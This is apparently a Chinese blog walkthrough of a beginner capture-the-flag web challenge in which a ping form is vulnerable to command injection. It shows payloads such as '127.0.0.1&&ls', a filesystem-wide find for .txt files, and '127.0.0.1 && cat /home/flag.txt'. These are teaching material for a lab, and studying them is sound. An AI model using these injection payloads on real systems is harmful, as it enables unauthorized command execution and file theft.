XCTF攻防世界web新手练习—command_execution

题目

题目为command_execution,是命令执行的意思,可见这道题应该跟命名执行有关。

XCTF攻防世界web新手练习—command_execution

打开题目,看到一个功能框,根据题目,是用来实现ping功能的。

XCTF攻防世界web新手练习—command_execution

首先先尝试ping一下127.0.0.1,成功ping通,并回显执行的命令为

XCTF攻防世界web新手练习—command_execution

于是我们尝试用&&符号执行多个命令,先尝试一下ls命令,输入127.0.0.1&&ls

XCTF攻防世界web新手练习—command_execution

可见,成功执行ls命令。于是顺理成章查找所有以 .txt 结尾的文件。
用find命令。输入127.0.0.1 &&find / -name “*.txt”

XCTF攻防世界web新手练习—command_execution

看到第一个就是flag.txt,于是利用命令cat 直接查看它

127.0.0.1 && cat /home/flag.txt

XCTF攻防世界web新手练习—command_execution

原创文章,作者:陌涛,如若转载,请注明出处:https://imotao.com/4060.html

(0)
陌涛的头像陌涛
上一篇 2020年9月29日
下一篇 2020年9月29日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据